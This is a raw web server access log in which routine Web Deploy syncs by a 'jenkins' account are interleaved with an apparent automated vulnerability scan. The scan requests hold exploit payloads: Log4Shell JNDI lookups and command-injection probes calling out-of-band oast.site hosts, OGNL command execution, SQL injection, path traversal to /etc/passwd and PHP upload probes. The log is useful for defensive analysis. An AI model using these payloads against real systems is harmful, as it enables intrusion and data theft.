2023-08-04 04:24:45 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 16
2023-08-04 04:24:45 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 32
2023-08-04 04:24:45 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 19
2023-08-04 04:24:45 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=e1c598f4-6ee0-4070-a372-27b1d7fceabf;op=Sync - 200 0 0 330
2023-08-04 04:24:45 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 390
2023-08-04 04:24:45 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 12
2023-08-04 04:25:48 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=e1c598f4-6ee0-4070-a372-27b1d7fceabf;op=Sync - 200 0 0 62294
2023-08-04 04:25:48 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 62339
2023-08-04 04:26:37 103.153.214.94 GET /${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 77
2023-08-04 04:26:44 103.153.214.94 GET /${@java.lang.Runtime@getRuntime().exec("nslookup+cj5gsq24749fn87ofdl0n8z4xns58dfdt.oast.site")}/ - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 61
2023-08-04 04:29:01 103.153.214.94 GET /index.php c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5(999999999)%27 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 56
2023-08-04 04:31:08 103.153.214.94 POST /wp-admin/admin-ajax.php action=action_name 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 68
2023-08-04 04:32:53 103.153.214.94 POST /soap.cgi service=whatever-control;curl 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 389
2023-08-04 04:35:40 103.153.214.94 GET /getFavicon host=http://oast.fun/ 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 81
2023-08-04 04:41:16 103.153.214.94 GET /cgi-bin-hax/ExportSettings.sh - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 81
2023-08-04 04:43:17 103.153.214.94 GET /.tugboat - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 81
2023-08-04 04:45:00 103.153.214.94 POST /debug.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 86
2023-08-04 04:47:00 103.153.214.94 POST /EemAdminService/EemAdmin - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 84
2023-08-04 04:53:53 103.153.214.94 GET /v1/folder path=%2F 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 64
2023-08-04 04:56:09 103.153.214.94 POST /wp-comments-post.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 81
2023-08-04 04:56:16 103.153.214.94 GET /wp-content/plugins/imagements/images/2tsgvnqssytfckb12pvzsszcdcl.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 55
2023-08-04 04:58:18 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 79
2023-08-04 05:05:44 103.153.214.94 POST /userportal/Controller mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"} 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 85
2023-08-04 05:06:58 103.153.214.94 POST /actuator/gateway/routes/2TSGVDaASHvHGLiEA1JTYG2TDWB - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 77
2023-08-04 05:07:06 103.153.214.94 POST /actuator/gateway/refresh - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 64
2023-08-04 05:07:14 103.153.214.94 DELETE /actuator/gateway/routes/2TSGVDaASHvHGLiEA1JTYG2TDWB - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 77
2023-08-04 05:10:57 103.153.214.94 PUT /v1/agent/service/register - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 87
2023-08-04 05:16:57 103.153.214.94 POST /directdata/direct/router - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 60
2023-08-04 05:17:05 103.153.214.94 GET /2TSGV5S4touiJt3iNyT2VPVCwKG.txt - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 70
2023-08-04 05:18:13 103.153.214.94 POST /console/css/%2e%2e%2fconsole.portal - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 400 0 0 92
2023-08-04 05:18:53 103.153.214.94 GET /plus/recommend.php action&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 59
2023-08-04 05:23:39 103.153.214.94 GET /wan.htm - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 70
2023-08-04 05:28:35 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 56
2023-08-04 05:31:25 103.153.214.94 GET /cgi-bin/touchlist_sync.cgi IP=;wget+http://cj5gsq24749fn87ofdl0zai6z6wiw51fq.oast.site; 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 46
2023-08-04 05:35:11 103.153.214.94 GET /upload/mobile/index.php c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'' 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 46
2023-08-04 05:38:03 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 49
2023-08-04 05:38:31 103.153.214.94 POST /api/login - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/manage/account/login?redirect=%2Fmanage 404 7 0 54
2023-08-04 05:40:50 103.153.214.94 GET /index.php option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 45
2023-08-04 05:43:51 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 90
2023-08-04 05:52:03 103.153.214.94 GET /upload/setup/install.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 45
2023-08-04 05:52:13 103.153.214.94 GET /setup/install.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 61
2023-08-04 05:57:20 103.153.214.94 GET /elFinder/php/connector.minimal.php cmd=mkfile&target=l1_Lw&name=2TSGVScUCFXFpSniRqhOX2KiDd5.php:aaa 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 49
2023-08-04 05:58:08 103.153.214.94 GET /fw.login.php apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 55
2023-08-04 06:04:49 103.153.214.94 GET /zp-core/setup/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 48
2023-08-04 06:04:57 103.153.214.94 GET /zp/zp-core/setup/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 50
2023-08-04 06:05:05 103.153.214.94 GET /gallery/zp-core/setup/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 44
2023-08-04 06:05:13 103.153.214.94 GET /zenphoto/zp-core/setup/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 43
2023-08-04 06:06:30 103.153.214.94 POST /cgi-bin/libagent.cgi type=J 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 43
2023-08-04 06:11:31 103.153.214.94 GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 42
2023-08-04 06:16:56 103.153.214.94 POST /conf_mail.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 50
2023-08-04 06:17:27 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 40
2023-08-04 06:19:46 103.153.214.94 POST /ws/v1/cluster/apps/new-application - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 310
2023-08-04 06:20:20 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 12
2023-08-04 06:20:20 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 22
2023-08-04 06:20:20 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 20
2023-08-04 06:20:20 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=01f1b699-c762-4398-9f07-1a5a5d48b97e;op=Sync - 200 0 0 294
2023-08-04 06:20:20 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 350
2023-08-04 06:20:20 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 9
2023-08-04 06:21:22 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 61935
2023-08-04 06:21:22 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=01f1b699-c762-4398-9f07-1a5a5d48b97e;op=Sync - 200 0 0 61907
2023-08-04 06:24:47 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 17
2023-08-04 06:24:47 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 26
2023-08-04 06:24:47 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 74
2023-08-04 06:24:47 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=d595c5a6-c282-4426-8f32-e326c140fb16;op=Sync - 200 0 0 278
2023-08-04 06:24:47 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 392
2023-08-04 06:24:47 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 8
2023-08-04 06:25:50 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=d595c5a6-c282-4426-8f32-e326c140fb16;op=Sync - 200 0 0 62593
2023-08-04 06:25:50 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 62616
2023-08-04 06:29:24 103.153.214.94 GET /login - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 55
2023-08-04 06:29:30 103.153.214.94 POST /Collector/diagnostics/ping - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 58
2023-08-04 06:29:37 103.153.214.94 GET /WidgetHandler.ashx MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 308
2023-08-04 06:34:54 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 49
2023-08-04 06:38:49 103.153.214.94 GET /seeyon/thirdpartyController.do.css/..;/ajax.do - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 5 0 42
2023-08-04 06:42:44 103.153.214.94 POST /ccms/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 43
2023-08-04 06:42:51 103.153.214.94 GET /ccms/dashboard.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 39
2023-08-04 06:46:19 103.153.214.94 POST /servlets/OmaDsServlet - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 52
2023-08-04 06:48:09 103.153.214.94 GET /wp-json/wp/v2/add-listing id=1 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 47
2023-08-04 06:48:13 103.153.214.94 GET /wp-admin/profile.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 69
2023-08-04 06:51:30 103.153.214.94 POST /CFIDE/adminapi/accessmanager.cfc method=foo&_cfclient=true 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 95
2023-08-04 06:54:03 103.153.214.94 GET /wp-content/plugins/wechat-broadcast/wechat/Image.php url=../../../../../../../../../../etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 87
2023-08-04 07:00:09 103.153.214.94 POST /Side.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 53
2023-08-04 07:03:39 103.153.214.94 GET /assets/app/something/services/AppModule.class/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 45
2023-08-04 07:06:07 103.153.214.94 GET /index.php m&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test")+and+extractvalue(1,concat(0x7e,md5(999999999)))+--+a 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 52
2023-08-04 07:07:42 103.153.214.94 POST /wp-admin/admin-ajax.php action=moove_read_xml 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 48
2023-08-04 07:12:25 103.153.214.94 GET /solr/admin/collections action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-887%7D%24%7B%3A-742}%7D.%24%7BhostName%7D.uri.cj5gsq24749fn87ofdl0of4k1p6fq3j1w.oast.site%2F%7D 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 52
2023-08-04 07:12:33 103.153.214.94 GET /solr/admin/cores action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-887%7D%24%7B%3A-742}%7D.%24%7BhostName%7D.uri.cj5gsq24749fn87ofdl0g19gg8bw3w6jk.oast.site%2F%7D 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 55
2023-08-04 07:13:43 103.153.214.94 GET /webGui/images/green-on.png/ path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 46
2023-08-04 07:19:15 103.153.214.94 GET /ebook/bookPerPub.php pubid=4' 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 44
2023-08-04 07:21:02 103.153.214.94 POST /jeecg-boot/jmreport/show - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 305
2023-08-04 07:21:29 103.153.214.94 GET /premise/front/getPingData url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 81
2023-08-04 07:28:32 103.153.214.94 GET /api/geojson url=${jndi:ldap://${:-129}${:-319}.${hostName}.url.cj5gsq24749fn87ofdl0egmip58mk8h9x.oast.site} 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 46
2023-08-04 07:30:30 103.153.214.94 GET /level/16/exec/show/config/CR - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 75
2023-08-04 07:31:58 103.153.214.94 GET /lab/api/settings/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 43
2023-08-04 07:33:58 103.153.214.94 GET /wp-content/plugins/chopslider/get_script/index.php id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 58
2023-08-04 07:35:20 103.153.214.94 POST /j_security_check - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 https://bcvt.kontum.gov.vn:8172/user/login 404 7 0 61
2023-08-04 07:43:38 103.153.214.94 GET /cgi-bin/kerbynet Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 47
2023-08-04 07:44:10 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 40
2023-08-04 07:47:04 103.153.214.94 POST /wp-admin/options-general.php page=smartcode 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 56
2023-08-04 07:47:12 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 45
2023-08-04 07:51:08 103.153.214.94 GET /zabbix/index_sso.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 47
2023-08-04 07:51:16 103.153.214.94 GET /index_sso.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 39
2023-08-04 07:52:17 103.153.214.94 POST /wp-admin/admin-ajax.php action=cfom_upload_file&name=2TSGVnRoeu9YxdiZrH8A7n0K0VR.pHp 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 49
2023-08-04 07:52:22 103.153.214.94 GET /wp-content/uploads/cfom_files/2tsgvnroeu9yxdizrh8a7n0k0vr.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 49
2023-08-04 07:57:08 103.153.214.94 POST /index.php m=member&f=login_save 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 46
